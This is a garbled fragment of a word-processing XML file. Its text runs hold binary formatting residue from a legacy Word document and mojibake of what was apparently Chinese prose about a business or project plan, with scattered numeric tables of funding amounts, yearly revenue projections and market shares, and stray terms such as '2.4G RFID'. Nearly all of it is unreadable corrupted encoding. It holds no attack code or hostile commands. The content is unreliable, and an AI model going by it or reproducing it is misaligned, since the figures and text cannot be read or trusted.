        <w:t>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,####?x#gd&amp;,####?=##?=###&gt;##.&gt;##&lt;&gt;##F&gt;##P&gt;##X&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;###?##??##??##??##??##??##??##??##??##??##???????????????????????|bR######################h?T?##h?T?#CJ##OJ##PJ##QJ##o(#3#j#####h?T?##h?0n#CJ##OJ##PJ##QJ##U##mH##nH##o(#u##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?0n#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#ht! #CJ##o(###h4B?##hm#?#CJ##OJ##PJ##o(###hm#?#CJ##OJ##PJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#hg#?#CJ##o(#!#j#####hm#?#CJ##U##mH##nH##o(#u##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#hCW?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#hm#?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?#r#CJ##o(###ht! #CJ##OJ##PJ##o(###hCW?#CJ##OJ##PJ##o(###h4B?##h&amp;,##CJ##OJ##PJ##o(###h&amp;,##CJ##OJ##PJ##o(###??##??###@###@###@###@##$@##6@##8@##&lt;@##F@##N@##X@##h@##~@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@###A##bA##tA##vA##???????????????????w?g?g?Z#######################h 3_#CJ##OJ##PJ##QJ##o(###h?A?##h 3_#CJ##OJ##PJ##QJ##o(#0#j#####h?A?##h?A?#CJ##OJ##PJ##QJ##U##mH##nH##u###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h 3_#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?A?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?/?#CJ##o(###h?A?##h?A?#CJ##PJ##o(###h?2?#CJ##OJ##PJ##o(###h?A?##h?T?#CJ##OJ##PJ##o(###h?A?#CJ##OJ##PJ##o(###h?A?#CJ##OJ##PJ##QJ##o(###h?T?##h?T?#CJ##OJ##PJ##QJ##o(###h?T?#CJ##OJ##PJ##QJ##o(####@##8@##X@##?@##?@##?@##?@##?@##?@##?@##?@##vA##?A##?A##?A###B##`B##?B##?B##?B##?############?############?############?############?############?############?############?############?############?############?############?############?############?############?############?############?############?############?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,####?x#G$#H$#gd?HC##</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$######??##?x##d,####?x#VD?#WD2#^??#`?x#gd?A?#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h###gd?A?##</w:t>
        <w:tab/>
        <w:t>###d,####?x#gd?/?######?x##?x##d,####?x#VD9#WD2#^?x#`?x#gd?A?###vA##?A##?A##?A##?A###B##,B##`B##nB##?B##?B##?B##?B##?B##?B##?B##?B##</w:t>
        <w:br/>
        <w:t>C###C##"C##$C##.C##2C##4C##@C##BC##XC##\C##?C##?C##?C##?C##?C##?C##?C###D##?D##?D##?D##?D##?D##2E##&lt;E##4F##&gt;F###G##$G##?G##???????????????????????????y????????????###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#hN*1#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h&amp;4P#CJ##o(###h?###6#?CJ##o(####h?###CJ##PJ##o(###h&amp;4P##h?###&gt;*#CJ####h&amp;4P##h&amp;4P#&gt;*#CJ##o(####h&amp;4P#&gt;*#CJ##o(##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?HC#CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?###CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(###h?"%#CJ##OJ##PJ##o(###h?"%##h?#r#CJ##OJ##PJ##o(###h?"%#CJ##OJ##PJ##QJ##o(###h??l#CJ##OJ##PJ##QJ##o(##/?B##?B##BC##DC##XC##?C##?C##?C##?C##?D##?D##2E##4F###G##?I##?I##jJ##nJ##pJ##?J##?J##pK##rK##?K##?L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,####?x#G$#H$#gd&amp;4P##</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$###?G##?G##?I##?I##?I##?I##?I##hJ##jJ##lJ##pJ##?J##?J##?J##nK##?K##?K###L##8L##:L##&gt;L##?L##?L##?L##?L##?L##?L##?L###M###M##&amp;M##.M##TM##XM##?M##?N##?N##?N###P###?##F?##H?##??##??##??##??##??##??##??##??##??##??##??##????????????????????????????????????????????####h?l7#6#?CJ##o(##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?l7#CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?l7#CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?L?#CJ##o(##U##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?!##CJ##o(#</w:t>
        <w:br/>
        <w:t>#h#$;#CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h#$;#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?u##CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>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J##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#hZC?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#hq(?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#hpY?#CJ##o(###h?###CJH#PJ##o(#</w:t>
        <w:br/>
        <w:t>#h?###CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#hN*1#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?y?#CJ##o(##4?L##PM##?M##2N##?N###?##F?##J?##L?##??##??##??##??##??##?############?############?############?############?############?############?############?############?############?############?############?############?##########################################################################################################d,####?x##$#G$#H$#If####l?#!###?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,####?x#G$#H$#a$##</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$######?H##d,####?x#G$#H$#WD^#`?H#gd?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,####?x#G$#H$#gd#$;######??##d,####?x#G$#H$#WD,#`??#gdZC?##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;h#b#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?Y?g#b?N</w:t>
        <w:tab/>
        <w:t>g{?~g?v?_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c*N#`?~egZPR??^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\#O?|?_Sb ??Q#N?|#R#O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??v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:Nxm?mvQ-N1#0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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N:?b/g</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N:#^:W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:??6q?_#`#\#N?ZP#b?|?T#0#b?N?vFU#N!j#_?S?N?O??#b?N?v#?.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R#N?v?]\O1\/f?l#NegZP?|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\?[L?#N/f*N?_'Y?v?c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#\????@b</w:t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?#0`?(??S??v?e?N?~vz#O0R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#N#b?N?</w:t>
        <w:tab/>
        <w:t>g#N*N?_}Y?vFU#N!j#_#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>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R?vMR:N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(W?b/g#_?S?eb??vD?ё;`?beQ/f#Y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R?Q?beQ?v#_?SD?ё#?#NCQ</w:t>
        <w:tab/>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###2#0#0#9#t^##2#0#1#0#t^##2#0#1#1#t^#####_?S??#Y##1#0###1#8###1#0######_?S?NXT?]D?##6#0###8#0###1#0#0#####????hKm9?(u##5###8###6#####vQ?[9?(u##1###1###2#####</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#??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T:N?O???N?T(??#0?N?TGS?~bc?N?T?O#c?b/gHQ?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?v#_?S?e#T#0#_?S??p?Tck(W#_?S?v?b/g?T?N?T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uP[?#??e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ck(W@w?R#_?S#c?~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/g?P#Y?]?[#b#0#?????#^:W?S#S?L?#T?y?R???f?e?T&gt;k#_noAm???? ##0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#_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~e??c#_sQ?e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T?v#_sQ#N?[#O???e?~?f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MR(W?V?Q??l</w:t>
        <w:tab/>
        <w:t>g#N*N:_</w:t>
        <w:tab/>
        <w:t>g?R?v?T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?v#x?S?R?_?P#Y?xdO\?e?~e??c?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S(W3#t^?QSb ?#N*N?V?Q?e?~#_sQ:_?R?TLr#0?*N#^:W/f?eQ?[?^?vwm??~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/f#b?N?b/g??p#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#_#_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?^zf???N?T?v?e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&gt;y#O?vpe#x?^(u?^???#O?eQR??^?[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UOZP?Q#??^R??^(u?vpeW[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Y#???hV?Tzf??opIQ?N?SR??^opIQ?c6R?|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\/f?N#TR??^?v?_#Y?N?T#0(W3#t^?Q#b?N???P#Y?*N?b/g#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#_#_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Q?c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?s(W?[?s?v/fR??^?[?b?r?z?\O?v?|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T???['Y?WR??^#N?[#O??BlT?Q?-N?c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??#\?N?T?[?s?e?~T?Q?v?v#h#0?7h1\#O(W*geg?n??#T?y#?Bl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Q?S?s</w:t>
        <w:tab/>
        <w:t>g?b/g#_?SD??n?N?S?b/g?P#Y?`?Q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lQ?S?s</w:t>
        <w:tab/>
        <w:t>g#b?q?v2#.#4#G# #</w:t>
        <w:tab/>
        <w:t>g?nR#F#I#D#?v?b/g?P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~M?WY?N??P[lQ?S?N?T#02#.#4#G# #R#F#I#D# ##h~{?T???QhV(W?V?Q??HQ#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#_#_#USkp?S5u?b/g?^(u?N?e?~#_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MR(W?V?Q#b?N#Y?N-#??HQ#0?y??b/g?v?meQ#_?S?</w:t>
        <w:tab/>
        <w:t>g?_'Yzz?#0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lQ?S?[Bl?b/g#_?S?OXb?`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\O?e#__#_#_#_#_#_#_#_#_#_#_#_#_#_#_#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#_#_#lQ?S#N?T#\?n#t?]'Yf[?m3W#xvz#ub?irT?Q#xvz#\?~?^?z?N#T\OsQ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_?SR#F#I#D#y??v#0y??v#b?gqQ?N#0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Q?S#\ǒ?S#`7h?v?o?R:g6R?T?c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#csQ.??b/g?NXT?T?b/g#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>O?v3z?[_#_#_#_#_#_#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#_#_#?[?NlQ?S????v??r^XT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?N?c?O???K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?#\L?v?#gCg?o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?r^XT?]MQ9?&gt;m?S#b?S6e?Sa??_'`9?(u#0lQ?S?v#^&lt;P??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O??N#gCg?v???v1\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XT?]?N9h,g</w:t>
        <w:br/>
        <w:t>N??S0W#N?_?R?N?YUO??lQ?S?f?R#b?R#0?v)R???R?f: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_#blQ?S?TXT?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#w0R?v@\b?#0?/f?o?R??r^XT?]?v#N?y?N&lt;P?S??v?R?l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Q?S*geg3# #~# #5#t^(W#x?SD?ё?beQ?T?NXT?beQ??#R#?#NCQ</w:t>
        <w:tab/>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#t^ # # # #?N##,{1#t^##,{2#t^##,{3#t^##,{4#t^##,{5#t^####D?ё?beQ##2#0#0###4#0#0###6#0#0###8#0#0###1#0#0#0#####?NXT#?*N</w:t>
        <w:tab/>
        <w:t>?##1#5###3#0###4#0###7#0###8#0#####,{?N?#R # #L?#N?S#^:W?`?Q</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#L?#N?`?Q#?L?#N?SU\?S?S?S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NL?#N?v?S#S?[?N?T)R?m#0)R?m?sq_?T??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Q?L?#N?v?b/g?X?W#08?#f?X?W#0?eV{P?6R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#N#^:WMRof#R?g#N??Km</w:t>
        <w:tab/>
        <w:t>?_#_#_#_#_#_#_#_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?^?#?L?#N?S?S?N</w:t>
        <w:br/>
        <w:t>N#N?~9#0#t^?N-N#g#_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N1#7#t^?S?S#0?~?S?N?N?xaS#?#?1#9#9#5#t^0R1#9#9#8#t^#??c?#_I#C#aS#?#?1#9#9#6#-#-#-#2#0#0#4#t^#?#\??aS#?#?2#0#0#3#t^# ?s(W#0R??^#??v???R/f(W#\??aS#??v#R{|#????aS1#3#.#5#6#k?yQ?vM#1#aS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:NM#1#aS?O?['`}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y#O?^(u^?l#0#f?NM?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(W^\?Nnf?S?e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MR(W?V?Q;NZPM#1#?#??v?N?N/f?m3W1r?#\lQ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?N2#0#1#2#t^#_?Y;NZPM#1#?#?#0#b:N?V?Q,{?N?[;NZPM#1#?#??v?S?[#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#_#_#_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T)R?m?T)R?m?s?S6R?NPg?e?N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??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ё?T?Pg?N&lt;hnm?R#0_#_#_#_#_#_#_#_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Q?~?|?#?L?#N?e?NUO?X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#\lQ?S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?N?o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  <w:tab/>
        <w:t>g'Y?TLr?N#u#0FO/f?~ǐ?St^?v?~Nm?l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,g</w:t>
        <w:br/>
        <w:t>NGS)R?m?s#N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#YlQ?S#Y?N#mLr6??k#0?N2#0#1#2#t^#_?YL?#N?s?X#O?_0R9e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/f?l#N?_egZP?N?T?v?_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#N?Q?/f?l</w:t>
        <w:tab/>
        <w:t>g#0??/f?_nm#l???b#b,g?b?N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~?(??#0@b?N?*NL?#N'Y?[??/f?N?v???@w(WZP#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#R??^?#??vMRof???[/f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R3#t^#T?S??iR#N?Q*N'Y?TLr#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##b?N?vy??v?vMR?l</w:t>
        <w:tab/>
        <w:t>g#N*N?z?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  <w:tab/>
        <w:t>g?S?k'`#0?Q#R#b?N?vFU#N!j#__N?#_?N8^</w:t>
        <w:tab/>
        <w:t>g?v#`?S#?.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2#t^?Q?l</w:t>
        <w:tab/>
        <w:t>g?z?N#?#0#b?N?S#???ZP}Y?N?TZP}Y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g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1\/f#b?N?vMRof@b(W#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#ǐ?S3# #~# #5#t^#Tt^hQL?#N#?.U;`??#?#?.U??te#T?#??T#_sQ?T#N*N*g#_?S?vL?#N#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#eg?n?S?R??^?[?b??X??T?fbc?k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T#_sQ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?[?N?T*g0O#?#NCQ</w:t>
        <w:tab/>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#t^ # # # #?N##MR5#t^##MR4#t^##MR3#t^##MR2#t^##MR1#t^#####?.U6eeQ##8#0#0#0#0###9#0#0#0#0###1#1#0#0#0###1#4#0#0#0###1#8#0#0#0######?.U?X??s####1#2#%###2#2#%###2#7#%###2#8#%#####</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#*geg3# #~#5# #t^#Tt^hQL?#N#?.U6eeQ??Km#?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,glQ?S#NL?#N?Q?N*N;N???z?N?[Kb?v?k??#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?z?N?[Kb###^:W?N??##?z?N#O?R##?z?N?R?R####1r?#\##1#5#%###?TLr##?N&lt;h?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#####?_??##8#%###?TLr+#?N??##.U#T</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?R?]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>######RsO##7#%####?.UQ?~#b?q##?O'????R?]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#####?R?~##6#%### nS?##?b/g?[?R?]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#####V#I#N#G#C#A#R#D###0#.#1#%###?TLr##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?R?T?N&lt;h</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#####,glQ?S##5#%####x?S???R+#?bU\???R##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?S?S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.UQ?~#####^:W#?.U</w:t>
        <w:tab/>
        <w:t>g?eL?#N?{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L?#N?{6R#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#lQ?S*geg3# #~# #5#t^?v#?.U6eeQ??Km#???D?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N#b?R?`?Q#N</w:t>
        <w:tab/>
        <w:t>?-#-#-#-#-#-##NCQ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#t^ # # # #?N##,{1#t^##,{2#t^##,{3#t^##,{4#t^##,{5#t^#####?.U6eeQ##2#8#0#0###3#8#0#0###5#0#0#0###6#5#0#0###8#0#0#0######^:W?N??##6#%###6#.#5#%###8#%###1#0#%###1#2#%#####</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#lQ?S*geg3# #~# #5#t^?v#?.U6eeQ??Km#???D?#b?R?`?Q#N</w:t>
        <w:tab/>
        <w:t>?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mQ?#R # #%?#?V{eu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
